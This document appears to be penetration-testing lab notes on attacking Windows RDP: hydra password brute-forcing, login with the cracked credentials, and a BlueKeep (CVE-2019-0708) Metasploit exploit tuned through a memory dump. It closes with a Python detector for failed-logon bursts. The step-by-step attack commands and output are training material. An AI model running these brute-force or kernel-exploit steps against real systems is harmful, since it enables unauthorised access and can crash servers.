
🔬RDP

Lab 1

🔬 Windows: Insecure RDP Service

  • Target IP: 10.4.18.131
  • RDP exploitation
  • Dictionaries to use:
    • /usr/share/metasploit-framework/data/wordlists/common_users.txt
    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.18.131

nmap -sV 10.4.18.131
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Use the Metasploit rdp_scanner module to check whether port 3333 is actually running RDP:

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run

Metasploit rdp_scanner

📌 RDP is exposed on port 3333 of the target, not on the default port 3389.

RDP Brute-force

  • Use hydra to find valid username/password pairs:

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333

[3333][rdp] host: 10.4.18.131   login: sysadmin   password: samantha
[3333][rdp] host: 10.4.18.131   login: demo   password: victoria
[3333][rdp] host: 10.4.18.131   login: auditor   password: elizabeth
[3333][rdp] host: 10.4.18.131   login: administrator   password: qwertyuiop

hydra

  • freerdp cannot be used in this lab
  • Use xfreerdp to connect to the target via RDP:

xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333

xfreerdp RDP connected

Reveal Flag: 🚩

port-number-3333


Lab 2 - BlueKeep (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 virtual machine and connected it to the same network as the Kali virtual machine. On the server, I have activated the RDP service on the default port 3389.

  • Host system: Kali Linux
  • Target system: Windows Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010
  • Exploitation tool:
  • Vulnerability: CVE-2019-0708 - BlueKeep
  • The vulnerability lives in kernel-space memory, so a failed attempt can crash the whole system, not just an application.
  • An attacker can remotely execute arbitrary code without authentication by gaining control of a chunk of kernel memory.
  • BlueKeep PoCs (proofs of concept) and exploits found online may themselves be malicious; use only verified exploit code and modules.

Metasploit BlueKeep modules

  • Target RDP activated:

Enumeration

nmap -sV -sC 192.168.31.131


  • 📌 RDP Port 3389 is open

Exploitation

msfconsole
search bluekeep
use 0 # Module auxiliary/scanner/rdp/cve_2019_0708_bluekeep ID
set RHOSTS 192.168.31.131
exploit

Metasploit cve_2019_0708_bluekeep

search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
exploit

Metasploit cve_2019_0708_bluekeep_rce

Win Server 2008 R2 crash

This exploit can crash the target kernel, so take care when running it against production environments.

Adjusting the exploit

Finding the NPP

  • The exploit needs the correct GROOMBASE value, which is the start address of the Non-Paged Pool (NPP).
  • The NPP address can be extracted from a memory dump of the target machine.
  • In VMWare, take a snapshot of the target virtual machine (Win Server 2008 R2).
    • Download the vmss2core tool
    • From the VM (virtual machine) folder copy the .vmem and .vmsn files to the vmss2core tool folder
    • Run the tool to generate a memory.dmp file
.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"
  • Run WinDbg and open the memory.dmp file
    • Run !poolfind a; the message it prints includes the Non-Paged Pool range
    • The first address in that range is the start of the Non-Paged Pool, in this case fffffa8018c08000

WinDbg

  • Edit the exploit and set the GROOMBASE variable if it is not already set.
    • In my case it is already set as the above address, for the 2008 R2 (6.1.7601 x64 - VMWare 15.1) target number 5.

  • Save the exploit file and run reload_all in the Metasploit interface.
  • Set the GROOMSIZE to 50.
msfconsole
search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
set GROOMSIZE 50
exploit

BlueKeep RCE Success


Lab 3 (Extra)

Windows RDP: Dictionary Attack

  • Target IP: 10.4.22.41
  • RDP exploitation
  • Dictionaries to use:
    • /usr/share/metasploit-framework/data/wordlists/common_users.txt
    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

nmap 10.4.22.41

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389

xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389

Reveal Flag: 🚩

sysadmin-stephaie-123
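The hydra runs in Lab 1 and Lab 3 each leave a burst of failed logons on the target, one Security event 4625 per guess, all from one source address and cycling through accounts. As an added example that is not part of these lab notes, this script applies a per-source sliding-window threshold to a constructed CSV export of such events; the column names, thresholds and sample rows are my assumptions, not a standard export format.

```python
"""Flag RDP password guessing from exported Windows Security events (ID 4625)."""
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export, one row per event, in chronological order. Not real log data.
SAMPLE_EVENTS = """\
time,event_id,logon_type,target_user,src_ip
2024-05-01T10:00:00,4625,10,sysadmin,10.4.18.5
2024-05-01T10:00:01,4625,10,sysadmin,10.4.18.5
2024-05-01T10:00:01,4625,10,demo,10.4.18.5
2024-05-01T10:00:02,4625,10,auditor,10.4.18.5
2024-05-01T10:00:02,4625,10,administrator,10.4.18.5
2024-05-01T10:00:03,4625,10,guest,10.4.18.5
2024-05-01T10:00:03,4625,10,backup,10.4.18.5
2024-05-01T10:05:00,4625,10,jsmith,10.4.18.77
2024-05-01T10:20:00,4624,10,jsmith,10.4.18.77
"""

# 10 = RemoteInteractive (classic RDP); failed NLA/CredSSP attempts are logged as 3 (Network).
RDP_LOGON_TYPES = {"10", "3"}
WINDOW = timedelta(seconds=60)
MAX_FAILURES = 5      # failed logons from one source inside WINDOW
MAX_USERS = 3         # distinct accounts tried from one source inside WINDOW


def detect_rdp_bruteforce(csv_text, window=WINDOW, max_failures=MAX_FAILURES, max_users=MAX_USERS):
    """Return {src_ip: (peak_failures, peak_distinct_users)} for sources over either threshold."""
    recent = defaultdict(deque)   # src_ip -> deque of (timestamp, user) still inside the window
    alerts = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["event_id"] != "4625" or row["logon_type"] not in RDP_LOGON_TYPES:
            continue              # only failed logons over RDP-style sessions count
        ts = datetime.fromisoformat(row["time"])
        window_q = recent[row["src_ip"]]
        window_q.append((ts, row["target_user"]))
        while window_q and ts - window_q[0][0] > window:
            window_q.popleft()    # slide the window forward
        users = {user for _, user in window_q}
        if len(window_q) >= max_failures or len(users) >= max_users:
            prev = alerts.get(row["src_ip"], (0, 0))
            alerts[row["src_ip"]] = max(prev, (len(window_q), len(users)))
    return alerts


if __name__ == "__main__":
    for src, (fails, users) in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(f"ALERT {src}: {fails} failed RDP logons across {users} accounts within {WINDOW}")
```

A single failure from 10.4.18.77 stays below both thresholds, so only the spraying source is reported.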